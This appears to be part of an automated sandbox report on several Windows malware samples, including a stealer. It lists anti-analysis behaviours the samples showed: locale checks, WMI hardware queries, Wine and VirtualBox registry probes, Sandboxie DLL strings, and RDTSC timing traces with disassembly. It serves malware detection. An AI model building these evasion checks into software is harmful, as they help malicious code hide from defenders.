Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: gold.exe PID: 2612, type: MEMORYSTR

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_14-57101

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF164 second address: 5DF169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF169 second address: 5DF16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF16F second address: 5DE987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov bl, al 0x00000011 mov bx, C8CDh 0x00000015 popad 0x00000016 mov dword ptr [ebp+122D1C87h], eax 0x0000001c push dword ptr [ebp+122D00C9h] 0x00000022 clc 0x00000023 call dword ptr [ebp+122D228Bh] 0x00000029 pushad 0x0000002a pushad 0x0000002b push ecx 0x0000002c or ebx, dword ptr [ebp+122D351Eh] 0x00000032 pop edi 0x00000033 mov edi, dword ptr [ebp+122D35FEh] 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c jc 00007F8A9D254EACh 0x00000042 add dword ptr [ebp+122D1C3Bh], esi 0x00000048 jmp 00007F8A9D254EB6h 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 mov dword ptr [ebp+122D1AC0h], eax 0x00000057 mov dword ptr [ebp+122D356Ah], eax 0x0000005d cmc 0x0000005e mov esi, 0000003Ch 0x00000063 jmp 00007F8A9D254EB1h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jo 00007F8A9D254EA7h 0x00000072 cmc 0x00000073 lodsw 0x00000075 cmc 0x00000076 cld 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b jmp 00007F8A9D254EB8h 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D1D10h], eax 0x0000008a nop 0x0000008b push eax 0x0000008c push edx 0x0000008d push ebx 0x0000008e pushad 0x0000008f popad 0x00000090 pop ebx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DE987 second address: 5DE98D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759544 second address: 75954C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75954C second address: 75955A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F8A9C76F216h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7596A1 second address: 7596A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7596A5 second address: 7596AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759938 second address: 75993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C644 second address: 75C64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C64A second address: 75C651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C651 second address: 5DE987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 06A3F338h 0x0000000e or dword ptr [ebp+122D22DBh], esi 0x00000014 push dword ptr [ebp+122D00C9h] 0x0000001a cld 0x0000001b call dword ptr [ebp+122D228Bh] 0x00000021 pushad 0x00000022 pushad 0x00000023 push ecx 0x00000024 or ebx, dword ptr [ebp+122D351Eh] 0x0000002a pop edi 0x0000002b mov edi, dword ptr [ebp+122D35FEh] 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 jc 00007F8A9C76F21Ch 0x0000003a add dword ptr [ebp+122D1C3Bh], esi 0x00000040 jmp 00007F8A9C76F226h 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D1AC0h], eax 0x0000004f mov dword ptr [ebp+122D356Ah], eax 0x00000055 cmc 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007F8A9C76F221h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jo 00007F8A9C76F217h 0x0000006a cmc 0x0000006b lodsw 0x0000006d cmc 0x0000006e cld 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jmp 00007F8A9C76F228h 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c mov dword ptr [ebp+122D1D10h], eax 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 push ebx 0x00000086 pushad 0x00000087 popad 0x00000088 pop ebx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C6C4 second address: 75C6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C6C8 second address: 75C6EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A9C76F216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jc 00007F8A9C76F216h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jc 00007F8A9C76F22Ch 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C946 second address: 75C94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C94D second address: 75C953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C953 second address: 75C957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CA72 second address: 75CA77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F11C second address: 76F121 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C24B second address: 77C257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C257 second address: 77C25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C25B second address: 77C278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8A9C76F224h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C530 second address: 77C545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007F8A9D254EA8h 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C545 second address: 77C54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C54B second address: 77C564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C682 second address: 77C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C687 second address: 77C68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C68F second address: 77C693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C924 second address: 77C92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C92D second address: 77C933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C933 second address: 77C937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CABE second address: 77CACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CEBE second address: 77CED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A9D254EB0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D19F second address: 77D1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F222h 0x00000007 jmp 00007F8A9C76F223h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8A9C76F222h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D1DA second address: 77D1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D1E0 second address: 77D1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DA4B second address: 77DA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DA50 second address: 77DA56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DA56 second address: 77DA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DA5A second address: 77DA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DA60 second address: 77DA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8A9D254EB0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DE63 second address: 77DE6D instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A9C76F216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77DE6D second address: 77DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E10B second address: 77E133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jo 00007F8A9C76F216h 0x0000000c pop edi 0x0000000d jmp 00007F8A9C76F225h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E133 second address: 77E13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8A9D254EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E13D second address: 77E147 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A9C76F216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78214A second address: 78214F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78214F second address: 782155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782155 second address: 782164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78280F second address: 78283A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F8A9C76F21Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8A9C76F225h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78283A second address: 782864 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8A9D254EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 js 00007F8A9D254EA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782864 second address: 78286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78286D second address: 782871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782871 second address: 782896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a jl 00007F8A9C76F21Ch 0x00000010 jp 00007F8A9C76F216h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e jng 00007F8A9C76F216h 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7532BA second address: 7532C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7532C0 second address: 7532C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7532C5 second address: 7532CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7532CC second address: 7532EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 ja 00007F8A9C76F222h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A1AD second address: 78A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F8A9D254EA6h 0x0000000c jmp 00007F8A9D254EB7h 0x00000011 popad 0x00000012 jmp 00007F8A9D254EB4h 0x00000017 rdtsc
